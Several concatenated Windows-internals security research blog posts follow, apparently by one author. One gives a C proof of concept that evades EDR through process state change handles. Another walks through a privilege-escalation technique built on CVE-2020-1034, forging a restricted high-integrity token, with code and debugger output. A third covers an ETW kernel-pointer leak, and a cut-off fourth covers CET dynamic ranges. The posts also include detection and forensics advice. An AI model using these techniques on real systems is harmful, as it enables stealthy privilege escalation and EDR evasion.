PspThreadStateChangeType has 2 registered procedures – the security procedure, which is SeDefaultObjectMethod and not too interesting to look at in this case as it is the default function, and the delete procedure, which is PspDeleteThreadStateChange. This function will get called every time a thread state change object is destroyed, and does a pretty simple thing:

If the target thread has a non-zero ThreadSuspendCount, the function will resume it as many times as it was suspended. As you can imagine, the process state change object also registers a delete procedure, PspDeleteProcessStateChange, which does something very similar.

New System Calls == New EDR Bypass

This is a nice, if slightly over-complicated, solution to the problem, but it has the unexpected side-effect of creating new and undocumented APIs to suspend and resume processes and threads. Since suspend and resume are very useful operations for attackers wishing to inject code, the well-known NtSuspendThread/Process and NtResumeThread/Process APIs are some of the first system calls that are hooked by security solutions, hoping to detect those attacks.

Having new APIs that perform the same operations without going through the well-known and often-monitored system calls is a great chance for attackers to avoid detection by security solutions that don’t keep up with recent changes (though I’m sure all EDR solutions have already started monitoring these new functions and have been doing so since this build was released. Right…?).

There is still a way to keep those same detections without following all of Microsoft’s recent code changes – even though this feature adds new system calls, the internal kernel mechanism invoked by them remains the same. And in Windows 10, this mechanism is using a feature whose sole purpose is to help security solutions gain more information about the system and get them away from relying on user-mode hooks – ETW tracing. And more specifically, the Thread Intelligence ETW channel that was added specifically for security purposes. That channel notifies about events that are often interesting to security products, such as virtual memory protection changes, virtual memory writes, driver loads, and, as you probably already guessed, suspending and resuming threads and processes. EDRs that register for these ETW events and use them as part of their detection will not miss any event due to the new state change APIs since these events will be received in either case. Those that don’t use them yet should probably open some Jira tickets that will be forgotten until this technique is found in the wild.

1 EDR Bypass + Windows Internals = 2 EDR Bypasses

However, this feature does create another interesting EDR bypass. As I mentioned, the suspended process or thread will automatically be resumed when the state change object gets destroyed. Normally, this would happen when the process that created the object either closes the only handle to it or exits – this automatically destroys all open handles held by the process. But an object only gets destroyed when all handles to it are closed and there are no more references to it. This means that if another process has an open handle to the state change object it won’t get destroyed when the process that created it exits, and the suspended process or thread won’t be resumed until the second process exits. This shouldn’t happen under normal circumstances, but if a process duplicates its handle to a state change object into another process, it can safely exit without resuming the suspended process or thread.

But why would a process want to do that?

The ETW events that report that a process is being suspended or resumed contain a process ID of the process that performed the action – this way the EDR that consumes the event can correlate different events together and attribute them to a potentially malicious process. In this case, the PID would be the ID of the process in whose context the action happened. So let’s say we create a process that suspends another process through a state change object, then duplicates the handle into a third process and exits. The process state change object doesn’t get destroyed et since there is still a running process with an open handle to it. Only when the other process exits, the duplicated handle gets closed and the suspended process gets resumed. But since the resume action happened in the context of the second process, which had nothing to do with the suspend action, that is the PID that will appear in the ETW event.

So, in this proposed scenario, a process will get suspended and later resumed, and ETW events will still be thrown for both actions. But these events will have happened in the context of 2 different processes so they will be difficult to link together, and it will be even more difficult to attribute the resume action to the first process without knowledge of this exact scenario. And we can be even smarter – a lot of security products ignore operations that are attributed to certain system processes. This makes sense, since those processes are not expected to be malicious but might have suspicious-looking activity, so it is easier to ignore them unless there is clear indication of code injection, to avoid false positives.

So we can even choose an innocent-looking Windows process to duplicate our handle into, to maximize the chances that the resume operation will be ignored completely. We just need to find a process that we can open a handle to and that will terminate at some point, to resume our suspended process.

Finally, Code!

In this PoC I simply create 2 notepad.exe processes. One will be suspended using a state change object, and the other will have the handle duplicated inside it. Then the PoC process exits but the suspended notepad remains suspended until the other notepad process is terminated:

#include <Windows.h>
#include <stdio.h>

EXTERN_C_START
NTSTATUS
NtCreateProcessStateChange (
    _Out_ PHANDLE StateChangeHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ PVOID ObjectAttributes,
    _In_ HANDLE ProcessHandle,
    _In_ ULONG Unknown
    );

NTSTATUS
NtChangeProcessState (
    _In_ HANDLE StateChangeHandle,
    _In_ HANDLE ProcessHandle,
    _In_ ULONG Action,
    _In_ PVOID ExtendedInformation,
    _In_ SIZE_T ExtendedInformationLength,
    _In_ ULONG64 Reserved
    );
EXTERN_C_END

int main ()
{
    HANDLE stateChangeHandle;
    PROCESS_INFORMATION procInfo;
    PROCESS_INFORMATION procInfo2;
    STARTUPINFOA startInfo;
    BOOL result;
    NTSTATUS status;

    stateChangeHandle = nullptr;

    ZeroMemory(&startInfo, sizeof(startInfo));
    startInfo.cb = sizeof(startInfo);
    result = CreateProcess(L"C:\\Windows\\System32\\notepad.exe",
                           NULL,
                           NULL,
                           NULL,
                           FALSE,
                           0,
                           NULL,
                           NULL,
                           &startInfo,
                           &procInfo);
    if (result == FALSE)
    {
        goto Exit;
    }
    CloseHandle(procInfo.hThread);
    result = CreateProcess(L"C:\\Windows\\System32\\notepad.exe",
                           NULL,
                           NULL,
                           NULL,
                           FALSE,
                           0,
                           NULL,
                           NULL,
                           &startInfo,
                           &procInfo2);
    if (result == FALSE)
    {
        goto Exit;
    }
    CloseHandle(procInfo2.hThread);

    status = NtCreateProcessStateChange(&stateChangeHandle,
                                        MAXIMUM_ALLOWED,
                                        NULL,
                                        procInfo.hProcess,
                                        0);
    if (!NT_SUCCESS(status))
    {
        printf("Failed creating process state change. Status: 0x%x\n", status);
        goto Exit;
    }
    //
    // Action == 0 means Suspend
    //
    status = NtChangeProcessState(stateChangeHandle,
                                  procInfo.hProcess,
                                  ProcessStateChangeSuspend,
                                  NULL,
                                  0,
                                  0);
    if (!NT_SUCCESS(status))
    {
        printf("Failed changing process state. Status: 0x%x\n", status);
        goto Exit;
    }

    result = DuplicateHandle(GetCurrentProcess(),
                             stateChangeHandle,
                             procInfo2.hProcess,
                             NULL,
                             NULL,
                             TRUE,
                             DUPLICATE_SAME_ACCESS);
    if (result == FALSE)
    {
        printf("Failed duplicating handle: 0x%x\n", GetLastError());
        goto Exit;
    }

Exit:
    if (procInfo.hProcess != NULL)
    {
        CloseHandle(procInfo.hProcess);
    }
    if (procInfo2.hProcess != NULL)
    {
        CloseHandle(procInfo2.hProcess);
    }
    if (stateChangeHandle != NULL)
    {
        CloseHandle(stateChangeHandle);
    }
    return 0;
}

Like a lot of other cases, this feature started out as a well-intentioned attempt to solve a minor system issue. But an over-engineered design led to multiple security concerns and whole new EDR evasion techniques which turned the relatively small issue into a much larger one.

Exploiting a “Simple” Vulnerability, Part 2 – What If We Made Exploitation Harder?

Introduction

In a previous post I went over vulnerability CVE-2020-1034, which allows arbitrary increment of an address, and saw how we can use some knowledge of ETW internals to exploit it, give our process SeDebugPrivilege and create an elevated process. In this post I will develop this exercise and make things harder by adding some restrictions and difficulties to  see how we can bypass those and still get our wanted result – privilege escalation from a low or medium IL process to a system-level one.

New Limitations

The exploit I wrote in part one works just fine, but let’s imagine there is ever a new limitation in the kernel that doesn’t let us increment Token.Privileges.Enabled directly, for example making it a read-only field except for specific kernel code that is meant to modify it.

So, how can we enable a privilege without incrementing the address ourselves?

Enabling Privileges

The answer to that question is pretty simple – we enable them just like a process can enable any other privileges that it owns but are disabled – through RtlAdjustPrivilege, or it’s advapi32 wrapper – AdjustTokenPrivileges. But here we face a problem: When we try calling RtlAdjustPrivilege to enable our newly-added SeDebugPrivilege, we get back STATUS_PRIVILEGE_NOT_HELD.

To understand why this is happening we’ll have to take a look inside the very ugly and not very readable kernel functions that are in charge of enabling privileges in a token. To try and enable a privilege RtlAdjustPrivilege uses the system call NtAdjustPrivilegesToken, which calls the function SepAdjustPrivileges. This function first checks if a process is running with high, medium or low integrity level. If it has high IL, it can enable any privilege that it owns. However if it’s running with medium IL, we reach the following check:

Each requested privilege is checked against this constant value, representing the privileges that medium IL processes are not allowed to have. The value of SeDebugPrivilege is 0x100000 (1 << 20), and we can see it’s one of the denied options so it cannot be enabled for processes that aren’t running with high integrity level, at least. If we choose to run our process as low IL or in an AppContainer, those have similar checks with even more restrictive values. As usual, the easy options failed early. However, there are always ways around those problems, we just need to look a bit deeper into the operating system to find them.

Fake EoP Leading to Real EoP

We need to have a high or System-IL process to enable debug privilege, but we were planning to use our new debug privilege to elevate ourselves (or our child process, to be exact) to System… So, we’re stuck, right?

Wrong. We don’t actually need a high or system-IL process, just a high or system-IL token. A process doesn’t always have to use the token it was created with. Threads can impersonate any token they have a handle to, including ones with higher integrity levels. Still, to do that we will need a handle to a process with higher IL than us, in order to duplicate its token and impersonate it. And to open a handle to such a process we’ll need to already have some privilege we don’t have, like debug privilege… and we’re stuck in a loop.

But as I learned from the many lawyers in my family (we are a good Jewish family after all, and no one wanted to be a doctor so we had to compensate) – every loop has a loophole, and this one is no different. We don’t need a handle to the token of a different process if we can cheat and create a token that matches the requirements ourselves!

To understand how that is possible we need to learn a bit about the Windows security model and how integrity levels work. To convince you to get through another 500 words of internals information I’ll tell you that Alex and I showed this idea to James Forshaw and he thought it was cool. And if he thinks it’s cool that should be a good enough reason for you to read through my rants until I finally circle back to the actual idea. And now to some internals stuff:

Tokens, Integrity Levels and Why an Unprotected Array is an Exploiter’s Best Friend

To check the integrity level of a token we need to look at a field named IntegrityLevelIndex inside the TOKEN structure. We can dump it for our process and see what it contains:

dx ((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->IntegrityLevelIndex
((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->IntegrityLevelIndex : 0xe [Type: unsigned long]

Like the name suggests, this value on its own doesn’t tell us much because it’s only an index inside an array of SID_AND_ATTRIBUTES structures, pointed to by the UserAndGroups field. We can verify this by looking at SepLocateTokenIntegrity, which is called by SepAdjustPrivileges to determine the integrity level of the token whose privileges it’s adjusting:

This array has multiple entries, the exact number of which changes between different processes. We can tell how many using the UserAndGroupCount field:

dx ((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->UserAndGroupCount
((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->UserAndGroupCount : 0xe [Type: unsigned long]
dx -g *((nt!_SID_AND_ATTRIBUTES(*)[0xe])((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->UserAndGroups)

This is cool and everything, but what does this actually mean and how does it help us fix our broken exploit?

Like the name suggests, a SID_AND_ATTRIBUTES structure contains a security descriptor (SID) and specific attributes for it. These attributes depend on the type of data we’re working with, in this case we can find the meaning of these attributes here. The security identifier part of the structure is the one telling us which user and groups this token belongs to. This piece of information determines what integrity level the token has and what it can and cannot do on the system. For example, only some groups can have access to certain processes and files, and in the previous blog post we learned that most GUIDs only allow certain groups to register them. SIDs have the format of S-1-X-…, which makes them easy to identify.

We can improve our WinDbg query to show all the groups that our token is a part of in a convenient format:

dx –s @$sidAndAttr = *((nt!_SID_AND_ATTRIBUTES(*)[0xf])((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->UserAndGroups)
dx -g @$sidAndAttr.Select(s => new {Attributes = s->Attributes, Sid = Debugger.Utility.Control.ExecuteCommand("!sid " + ((__int64)(s->Sid)).ToDisplayString("x"))[0].Remove(0, 8)})

The entry that our token is pointing to, at 0xe, is the last one in the table, and it’s the SID for medium integrity level, which is the reason we can’t enable our debug privilege. However, the design of this system gives us a way to bypass out integrity level issue. The UserAndGroups field points to the array, but the array itself is allocated immediately after the TOKEN structure. And this is not the last thing in this memory block. If we dump the TOKEN structure we can see that right after the UserAndGroups field there is another pointer to an array of the same format, called RestrictedSids:

[+0x098] UserAndGroups    : 0xffffad8914e1e4f0 [Type: _SID_AND_ATTRIBUTES *]    
[+0x0a0] RestrictedSids   : 0x0 [Type: _SID_AND_ATTRIBUTES *]

Restricted tokens are a way to limit the access that a certain process or thread will have by only allowing the token to access objects whose ACL specifically allows access to that SID. For example, if a token has a restricted SID for “Bob”, then the process or thread using this token can only access files if they explicitly allow access to “Bob”. Even if “Bob” is part of a group that is allowed to access the file (like Users or Everyone), it will be denied access unless the file “knows” in advance that “Bob” will try to access it and adds the SID to its ACL. This capability is sometimes used in services to restrict their access only to objects that are necessary for them to use and reduce the possible attack surface. Restricted tokens can also be used to remove default privileges from a token that doesn’t need them. For example, the BFE service uses a write restricted token. This means it can have read access to any object, but can only get write access to objects which explicitly allow its SID:

There are two important things to know about restricted tokens that make our elevation trick possible:

  1. The array of restricted SIDs is allocated immediately after the UserAndGroups array.

  2. It is possible to create a restricted token for any SID, including ones that the process doesn’t currently have.

These 2 facts mean that even as a low or medium IL process, we can create a restricted token for high IL SID and impersonate it. This will add a new SID_AND_ATTRIBUTES entry to the RestrictedSids array, immediately after the UserAndGroups array, in a way that can be looked at as the next entry in the UserAndGroups array. The current IntegrityLevelIndex points to the last entry in the UserAndGroups array, so one little increment of the index will make it point to the new high IL restricted token. How lucky are we to have an arbitrary increment vulnerability?

Lets try this out. We use CreateWellKnownSid to create a WinHighLabelSid, and then use CreateRestrictedToken to create a new restricted token with a high IL SID, then impersonate it:

HANDLE tokenHandle;
HANDLE newTokenHandle;
HANDLE newTokenHandle2;
PSID pSid;
PSID_AND_ATTRIBUTES sidAndAttributes;
DWORD sidLength = 0;
BOOL bRes;

//
// Call CreateWellKnownSid once to check the needed size for the buffer
//

CreateWellKnownSid(WinHighLabelSid, NULL, NULL, &sidLength);

//
// Allocate a buffer and create a high IL SID
//

pSid = malloc(sidLength);
CreateWellKnownSid(WinHighLabelSid, NULL, pSid, &sidLength);

//
// Create a restricted token and impersonate it
//

sidAndAttributes = (PSID_AND_ATTRIBUTES)malloc(0x20);
sidAndAttributes->Sid = pSid;
sidAndAttributes->Attributes = 0;

bRes = OpenProcessToken(GetCurrentProcess(),
                        TOKEN_ALL_ACCESS,
                        &tokenHandle);

if (bRes == FALSE)
{
    printf("OpenProcessToken failed\n");
    return 0;
}

bRes = CreateRestrictedToken(tokenHandle,
                             WRITE_RESTRICTED,
                             0,
                             NULL,
                             0,
                             NULL,
                             1,
                             sidAndAttributes,
                             &newTokenHandle2);

if (bRes == FALSE)
{
    printf("CreateRestrictedToken failed\n");
    return 0;
}

bRes = ImpersonateLoggedOnUser(newTokenHandle2);
if (bRes == FALSE)
{
    printf("Impersonation failed\n");
    return 0;
}

Now lets look at our thread token and its groups. Notice that we are impersonating this new token, so we need to check the impersonation token of our thread, as our primary process token is not affected by any of this:

dx -s @$token = ((nt!_TOKEN*)(@$curthread.KernelObject.ClientSecurity.ImpersonationToken & ~0xf))

dx new {GroupsCount = @$token->UserAndGroupCount, UserAndGroups = @$token->UserAndGroups, RestrictedCount = @$token->RestrictedSidCount, RestrictedSids = @$token->RestrictedSids, IntegrityLevelIndex = @$token->IntegrityLevelIndex}
new {GroupsCount = @$token->UserAndGroupCount, UserAndGroups = @$token->UserAndGroups, RestrictedCount = @$token->RestrictedSidCount, RestrictedSids = @$token->RestrictedSids, IntegrityLevelIndex = @$token->IntegrityLevelIndex}

GroupsCount      : 0xf [Type: unsigned long]
UserAndGroups    : 0xffffad890d5ffe00 [Type: _SID_AND_ATTRIBUTES *]
RestrictedCount  : 0x1 [Type: unsigned long]
RestrictedSids   : 0xffffad890d5ffef0 [Type: _SID_AND_ATTRIBUTES *]
IntegrityLevelIndex : 0xe [Type: unsigned long]

UserAndGroups still has 0xf entries and our IntegrityLevelIndex is still 0xe, like in the primary token. But now we have a restricted SID! I mentioned earlier that because of the memory layout we can treat this restricted SID like an additional entry in the UserAndGroups array, lets test that. We’ll try to dump the array the same way we did before, but pretend it has 0x10 entries:

dx -s @$sidAndAttr = *((nt!_SID_AND_ATTRIBUTES(*)[0x10])@$token->UserAndGroups)
dx -g @$sidAndAttr.Select(s => new {Attributes = s->Attributes, Sid = Debugger.Utility.Control.ExecuteCommand("!sid " + ((__int64)(s->Sid)).ToDisplayString("x"))[0].Remove(0, 8)})

And it works! It looks as if there are now 0x10 valid entries, and the last one has a high IL SID, just like we wanted.

Now we can run our exploit like we did before, with two small changes:

  1. All changes need to use our current thread token instead of the primary process token.

  2. We need to trigger the exploit twice – once to increment Privileges.Present to add SeDebugPrivilege and another time to increment IntegrityLevelIndex to point to entry 0xf.

Nothing ever validates that the IntegrityLevelIndex is lower than UserAndGroupCount (and if something did, we could use the same vulnerability to increment it as well). So, when our new impersonation token points to a high IL SID, SepAdjustPrivileges thinks that it is running as a high IL process and lets us enable whichever privilege we want. After making the changes to the exploit we can run it again and see that RtlAdjustPrivileges returns STATUS_SUCCESS this time. But I never fully believe the API and want to check for myself:

Or if you prefer WinDbg:

dx -s @$t0 = ((nt!_TOKEN*)(@$curthread.KernelObject.ClientSecurity.ImpersonationToken & ~0xf))

1: kd> !token @$t0 -n
_TOKEN 0xffffad89168c4970
TS Session ID: 0x1
User: S-1-5-21-2929524040-830648464-3312184485-1000 (User:DESKTOP-3USPPSB\yshafir)
User Groups:
...
Privs:
19 0x000000013 SeShutdownPrivilege               Attributes -
20 0x000000014 SeDebugPrivilege                  Attributes - Enabled
23 0x000000017 SeChangeNotifyPrivilege           Attributes - Enabled Default
25 0x000000019 SeUndockPrivilege                 Attributes -
33 0x000000021 SeIncreaseWorkingSetPrivilege     Attributes -
34 0x000000022 SeTimeZonePrivilege               Attributes -
Authentication ID:         (0,2a084)
Impersonation Level:       Impersonation
TokenType:                 Impersonation
...
RestrictedSidCount: 1      
RestrictedSids: 0xffffad89168c4ef0
Restricted SIDs:
00 S-1-16-12288 (Label: Mandatory Label\High Mandatory Level)
Attributes - Mandatory Default Enabled
…

Our impersonation token has SeDebugPrivilege, just like we wanted. Now we can do what we did last time and run an elevated cmd.exe under the DcomLaunch service. You might wonder if we really need to do that, now that we have a high IL token. But restricted tokens are still not really regular tokens, and we will probably face some issues if we try to run as a fake elevated process using a restricted token. It might also look a little suspicious to anyone who might be scanning our process, so it’s best to create a new process that can run as SYSTEM without any tricks.

Forensics

This trick we’re using is pretty cool, not only because it lets us cheat the system but also because it’s pretty hard to detect. The biggest tell for anyone looking for it would be that the IntegrityLevelIndex is outside the bounds of the UserAndGroups array, but even if someone looking at that it’s easy enough to trigger the vulnerability one more time to increment UserAndGroupCount as well. This is still detectable if you calculate the end address of the UserAndGroups array based on the count and compare it with the start address of the RestrictedSids array, seeing that they don’t match. But this is super specific detection that is probably a bit too much for a very uncommon technique.

A second way to find this is to search for threads impersonating restricted tokens. This is pretty uncommon and when I run this query the only process that comes up is my exploit:

dx @$cursession.Processes.Where(p => p.Threads.Where(t => t.KernelObject.ActiveImpersonationInfo != 0 && ((nt!_TOKEN*)(t.KernelObject.ClientSecurity.ImpersonationToken & ~0xf))->RestrictedSidCount != 0).Count() != 0)
@$cursession.Processes.Where(p => p.Threads.Where(t => t.KernelObject.ActiveImpersonationInfo != 0 && ((nt!_TOKEN*)(t.KernelObject.ClientSecurity.ImpersonationToken & ~0xf))->RestrictedSidCount != 0).Count() != 0)
[0x279c]         : exploit_part_2.exe [Switch To]

But this is a very targeted search, that will only find this very specific case. And anyway it’s easy enough to avoid by making the thread revert back to its original token after the privilege is enabled. This is generally a good practice – don’t let your exploit keep “suspicious” attributes for longer than necessary to minimize possible detections. However, all the forensic ideas I mentioned in the previous blog post still work in this case – we’re using the same vulnerability and triggering it the same way, so we still register a new ETW provider that no one else uses and leaving occupied slots that can never be emptied without crashing the system. So if you know what to look for, this is a pretty decent way to find it.

And of course, there is the fact that a Medium IL process suddenly managed to grab SeDebugPrivilege, open a handle to DcomLaunch and create a new reparented, elevated process. That would (hopefully) raise some flags for a couple of EDR products.

Conclusion

This post described a hypothetical scenario where we can’t simply increment Privileges.Enabled in our process token. We currently don’t need all these fancy tricks, but they are very cool to find and exploit, sort of like a DIY CTF, and maybe one day they will turn out to be useful in another context. These tricks clearly show that the token contains lots of interesting fields that can be used in various ways, and how a single increment and some internals knowledge can take you a long way.

Since the token is this vulnerable and doesn’t tend to change very often, maybe it’s time to protect it better, for example by moving it to the Secure Pool?

In this post and the previous one I ended up grabbing SeDebugPrivilege and using a reparenting trick to create a new elevated process. In a future post that might happen one day, I will look at some other privileges that are mostly ignored in the exploitation field and can be used in new and unexpected ways.


The full PoC for this technique can be found here.

Read our other blog posts:

Exploiting a “Simple” Vulnerability – Part 1.5 – The Info Leak

Introduction

This post is not actually directly related to the first one and does not use CVE-2020-1034. It just talks about a second vulnerability that I found while researching ETW internals, which discloses the approximate location of the NonPaged pool to (almost) any user. It was spurred by a tweet that challenged me to find an information leak. It turns out I found one that wasn’t actually patched after all!

The vulnerability itself is not especially interesting, but the process of finding and understanding it was fun so I wanted to write about that. Also, when I reported it Microsoft marked it as “Important” but would not pay anything for it and eventually marked it as “won’t fix” even though fixing this issue takes less time than writing an email, so the annoyance factor alone makes writing this post worth it. And this is a chance to rant about some more ETW internals stuff which didn’t really fit into any of the other posts, so you can read them or skip right to the PoC, your choice.

Update

This vulnerability was eventually acknowledged by Microsoft and received CVE-24107. It was fixed on 9/3/2021.

More ETW Internals!

Remember that the first thing you learn about ETW notifications are that they are asynchronous? Well, that was a lie. Sort of. Most ETW notifications really are asynchronous. However, in the previous blog post we used a vulnerability that relied on improper handling of the ReplyRequested field in the ETWP_NOTIFICATION_HEADER structure. The existence of this field implies that you can reply to an ETW event. But no one ever told you that you can reply to an ETW notification, how would that even work?

Normally, ETW works just the way you were told. That is the case for all Windows providers, and any other ETW provider I could find. But there is a “secret setting” that happens when someone notifies an ETW provider with ReplyRequested = 1. Then, as we saw in the previous blog post, the notification gets added to a reply queue and is waiting for a reply. Remember, there can only be 4 queues notifications waiting for a reply at any moment. When that happens, any process which registered for that provider has its registered callback notified and has a chance to reply to the notification using EtwReplyNotification. When someone replies to the notification, the original notification gets removed from the queue and the reply notification gets added to the reply queue.

The only case I could see so far where a reply is sent to a notification is immediately after a GUID is enabled – sechost!EnableTraceEx2 (which is the standard way of registering a provider and enabling a trace) has a call to ntdll!EtwSendNotification with EnableNotificationPacket->DataBlockHeader.ReplyRequested set to 1. That creates an EtwRegistration object, so before returning to Sechost, Ntdll immediately replies to the notification with NotificationHeader->NotificationType set to EtwNotificationTypeNoReply, simply to get it removed from the notification queue.

Specifically, in this case, something a little more complicated happens. Even though Ntdll is enabling the GUID, it’s not the “owner” of the registration instance and therefore doesn’t have a registered callback (since this belongs to whoever registered the provider). Yet Ntdll still needs to know when the kernel enables the provider, to queue the reply notification – it can’t expect the caller to know that this needs to be done. So to do this, it uses a trick.

When EtwRegisterProvider is called, it calls EtwpRegisterProvider. The first time this function is called, it calls EtwpRegisterTpNotificationOnce:

Without getting into too many internal details about waits and the thread pool, this function essentially creates an event with the callback function EtwpNotificationThread and then calls NtTraceControl with an Operation value of 27 – an undocumented and unknown value. Looking at the kernel side of things, it’s not too hard to give this value a name:

I’ll call this operation EtwAddNotificationEvent.

EtwpAddNotificationEvent is a pretty simple function: it receives an event handle, grabs the event object, and sets EventDataSource->NotificationEvent in the EPROCESS of the current process to the event (or NotificationEventWow64, if this is a WoW64 process). Since this field is a pointer and not a list, it can only contain one event at a time. If this field is not set to 0, the value won’t be set and the caller will receive STATUS_ALREADY_REGISTERED as a response status.

Then, in EtwpQueueNotification, immediately after a notification is added to the notification queue for the process, this event is signaled:

The event being signaled makes the EtwpNotificationCallback get called, since it was registered to wait on this event, so it is, in a way, an ETW notification callback that is being notified whenever the process receives an ETW notification. However, this function is not a real ETW notification callback, so it doesn’t receive the notification as any of its parameters and has to somehow get it by itself in order to reply to it. Luckily, it has a way to do that.

The first thing that EtwpNotificationThread does is make another call to NtTraceEvent, this time with operation number 16EtwReceiveNotification. This operation leads to a call to EtwpReceiveNotification, which chooses the first queued notification for the process (and matching the process’ WoW64 status) and returns it. This operation requires no input arguments – it simply returns the first queued notification. This gives EtwpNotificationThread all the information that it needs to reply to that last queued notification quietly, without disturbing the unaware caller that simply asked it to register a provider. After replying, the event is set to a waiting state again, to wait for the next notification to arrive.

Most of this pretty long explanation has nothing to do with this vulnerability, which really is pretty small and simple and can be explained in a much less complicated way. But I did say this post was mostly an excuse to dump some more obscure ETW knowledge in hope that one day someone other than me will read it and find it helpful, so you all knew what you were getting into.

And now that we have all this unnecessary background, we can look at the vulnerability itself.

The InfoLeak

The issue is actually in the last part we talked about – returning the last queued notification. If you remember from the last post, when a GUID is notified and the notification header has ReplyRequested == 1, this leads to the creation of a kernel object which will be placed in the ReplyObject field of the notification that is later put in the notification queue. And this is the same structure that can be retrieved using NtTraceControl with EtwReceiveNotification operation… Does that mean that we get a free kernel pointer by calling NtTraceControl with the right arguments?

Not exactly. To be precise, you get half of a kernel pointer. Microsoft didn’t completely ignore the fact that retuning kernel pointers to user-mode callers is a bad idea, like they did in so many other cases. The ReplyObject field in ETWP_NOTIFICATION_HEADER is in a union with ReplyHandle and RegIndex. And after copying the data to the user-mode buffer, they set the value of RegIndex, which should overwrite the kernel pointer that is in the same union:

The only thing that this code doesn’t account for is the fact that ReplyObject and RegIndex don’t have the same type: ReplyObejct is a pointer (8 bytes on x64) while RegIndex is a ULONG (4 bytes on x64). So setting RegIndex only removes the bottom half of the pointer, leaving the top half to be returned to the caller:

Triggering this is extremely simple and includes exactly three steps:

  1. Register a provider
  2. Queue a notification where ReplyObject is a kernel object – do this by calling NtTraceControl with operation == EtwSendDataBlock and ReplyRequested == TRUE in the notification header.
  3. Call NtTraceControl with operation == EtwReceiveNotification and get your half of a kernel pointer.

It’s true that the top half of a kernel address is not all that much, but it can still give a caller a better guess of where the NonPagedPool (where those objects are allocated) is found. In fact, since the NonPagedPool is sized 16TB (or 0x100000000000 bytes), this vulnerability tells us exactly where the NonPaged pool is, and we can validate that in the debugger:

!vm 21
...
System Region               Base Address    NumberOfBytes
SecureNonPagedPool    : ffff838000000000       8000000000
KernelShadowStacks    : ffff888000000000       8000000000
PagedPool             : ffff8a0000000000     100000000000
NonPagedPool          : ffff9d0000000000     100000000000
SystemCache           : ffffb00000000000     100000000000
SystemPtes            : ffffc40000000000     100000000000
UltraZero             : ffffd40000000000     100000000000
Session               : ffffe40000000000       8000000000
PfnDatabase           : ffffe78000000000      c8000000000
PageTables            : fffff40000000000       8000000000
SystemImages          : fffff80000000000       8000000000
Cfg                   : fffffaf0ea2331d0      28000000000
HyperSpace            : fffffd0000000000      10000000000
KernelStacks          : fffffe0000000000      10000000000

This can be triggered from almost any user, including Low IL and AppContainer, where most of the classic infoleaks don’t work anymore, this might be of some use, even if a limited one.

I believe that when this code was introduced, it was completely safe – those areas of the code are pretty ancient and get very few changes. This code was probably introduced in the days before x64, when the size of a pointer and the size of a ULONG was the same, so setting RegIndex did overwrite the whole object address. When x64 changed the size of a pointer, this code was left behind and was never updated to match this, so this bug appeared.

This makes you wonder what similar bugs might exist in other pieces of ancient code that even Microsoft forgot about?

Just Show Me the Code Already!

In case you want to see the three lines of code that trigger this bug, you can find them here.

CET Updates – Dynamic Address Ranges

In the last post I covered one new addition to CET – relaxed mode. But as we saw, there were a few other interesting additions. One of them is CetDynamicApisOutOfProcOnly, which is the one I will be covering in this post and which was also backported to 20H1 and 20H2.

But before I explain the flag, let’s talk about the mechanism that it mitigates.

Dynamic Enforced Address Ranges

As we know, Microsoft’s implementation of hardware CET prevents a process from setting the instruction pointer to non-approved values through backward edge (“return”) flows, including through OS-provided mechanisms. Whether it’s by returning to an address that’s different from the one that’s in the shadow stack, or setting the thread context, or unwinding to an unexpected address during exception handling. But like we’ve seen in the last two posts, there are cases that require special handling. One of those is dynamically generated (JIT) code.

Such code doesn’t always follow the rules and assumptions of CET, so Microsoft added a way to handle its needs, similar to the handling of Dynamic Exception Handler Continuation Targets, which I talked about in the first post. In this solution, a process can declare some ranges as “CET compatible” such that setting the instruction pointer to any address within that range won’t trigger a CET exception (#CP) that will crash the process.

To keep those ranges, the EPROCESS received a new field:

typedef struct _EPROCESS
{
    ...
    /* 0x0b18 */ struct _RTL_AVL_TREE DynamicEHContinuationTargetsTree;
    /* 0x0b20 */ struct _EX_PUSH_LOCK DynamicEHContinuationTargetsLock;
    /* 0x0b28 */ struct _PS_DYNAMIC_ENFORCED_ADDRESS_RANGES DynamicEnforcedCetCompatibleRanges;
    /* 0x0b38 */ unsigned long DisabledComponentFlags;
    ...
} EPROCESS, *PEPROCESS;

This new PS_DYNAMIC_ENFORCED_ADDRESS_RANGES structure contains an RTL_AVL_TREE and an EX_PUSH_LOCK. New ranges are inserted into the tree through a call to NtSetInformationProcess with the new information class ProcessDynamicEnforcedCetCompatibleRanges (0x66). The caller supplies a pointer to a PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGE_INFORMATION structure as the ProcessInformation argument, which contains the ranges to insert into the tree, or remove from it, depending on the Flags field:

typedef struct _PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGE
{

    ULONG_PTR BaseAddress;
    SIZE_T Size;
    DWORD Flags;
PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGE, *PPROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGE;

typedef struct _PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGES_INFORMATION
{

    WORD NumberOfRanges;
    WORD Reserved;
    DWORD Reserved2;
    PPROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGE Ranges;
PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGES_INFORMATION, *PPROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGES_INFORMATION;

The ranges are then read from the structure and inserted into the tree by the PspProcessDynamicEnforcedAddressRanges function. Of course, the process doesn’t have to call NtSetInformationProcess directly, as there is a wrapper function for this in the Win32 API exposed by KernelBase.dllSetProcessDynamicEnforcedCetCompatibleRanges:

BOOL
SetProcessDynamicEnforcedCetCompatibleRanges (
    _In_ HANDLE ProcessHandle,
    _In_ WORD NumberOfRanges,
    _In_ PPROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGE Ranges
    )
{
    NTSTATUS status;
    PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGES_INFORMATION dynamicEnforcedAddressRanges;
    dynamicEnforcedAddressRanges.NumberOfRanges = NumberOfRanges;
    dynamicEnforcedAddressRanges.Ranges = Ranges;
    status = NtSetInformationProcess(ProcessHandle,
